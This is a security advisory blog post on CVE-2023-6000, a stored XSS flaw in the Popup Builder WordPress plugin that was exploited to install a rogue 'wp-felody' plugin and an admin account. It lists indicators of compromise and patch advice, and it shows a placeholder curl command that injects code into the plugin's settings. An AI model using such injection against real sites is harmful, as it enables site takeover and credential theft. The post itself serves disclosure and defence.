Overview
On December 11, 2023, a significant security flaw emerged in the Popup Builder WordPress plugin. This flaw, called Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability, allows unauthenticated attackers to inject harmful JavaScript, creating a risk of compromising websites. In this blog post, we share the details of the attack, its implications, and the steps you can take to secure your website. The Popup Builder is a quite popular WordPress plugin (more than 200,000 active installs) which makes thousands of websites vulnerable. We hope most of them already updated the plugin to a patched version, but the real number of affected domains remains unknown.
Key Takeaways
| Compromised WordPress plugin | Popup Builder, version older than 4.2.3 |
| Fixed Version | 4.2.3 |
| CVE-ID | CVE-2023-6000 |
| CVSS v3.1 | 8.8 |
| How to prevent attack | Update plugin to the latest version immediately! |
Understanding the Attack
Discovery
On January 10th, 2024, a submitted malware exposed an exploit of the vulnerability. The method involved injecting an unauthorized admin account, paving the way for a complete takeover of the target website. Notably, this attack stood out for directly injecting a WordPress administrator account, showcasing a higher level of sophistication.
How It Happened
The attacker employed a simple yet effective technique—using an unauthenticated HTTP request to insert malicious code into the plugin’s “Custom JS” settings. Leveraging the JavaScript `eval()` method, attackers could execute arbitrary code with administrative privileges, gaining unprecedented control over the compromised website.
This simple terminal command could execute a dangerous code in attacked website:
curl --url 'http://hacked-site.com/' --data 'post_ID=[XXX]&[MALICIOUS_CODE]'Code Analysis
In a most common attack the executed code installed a WP Plugin made by the attacker. A closer look at the rogue plugin, named “WP Felody” revealed well-structured and elegant source code. The script, embedded in the fetch method’s body parameter, executed whenever a user visited the website. The script’s purpose was to create a fake admin account, mirroring legitimate ones, and send the credentials to a server controlled by the attacker. From there the attacker had a full control over hacked website.
How to Check if My WordPress Website Was Compromised?
If you suspect your WordPress website may have been compromised, there are a few signs you can check for. One major red flag is if there is a new admin user account with the username wpx or the email address . This account likely does not belong to anyone who should have admin access, and indicates unauthorized access. Additionally, check if a plugin called wp-felody has been installed. This malicious plugin is often installed by attackers to gain backdoor access to WordPress sites. Its presence is a clear sign your site’s security has been breached. If you find either of these indicators, act quickly to secure your site and prevent further abuse or malware from being installed.
How to Prevent the Attack?
Update the Popup Builder plugin to the latest version. Versions newer than 4.2.3 are safe to use, as of today. For a peace of mind update all your plugins as well and Upgrade WordPress to the latest version.
Timeline
- 7th November 2023
Details of the vulnerability sent to the Popup Builder team
- 7th December 2023
Patch released by the Popup Builder team on version 4.2.3
- 11th December 2023
Vulnerability in Popup Builder Disclosed
- 1st January 2024
Exploit Proof of Concept released on WPScan
- 10th January 2024
Source code used in the injection shared. Malware signature developed.
[Q] How to Spot a Compromised Site?
Check for the `wp-felody` plugin and an admin account with the username `wpx` or email ``.
[Q] What Sets This Attack Apart?
This attack is more sophisticated, directly injecting a WordPress admin account. The attacker’s domain, `wpemojii.com`, suggests an ongoing exploitation campaign since December 2023.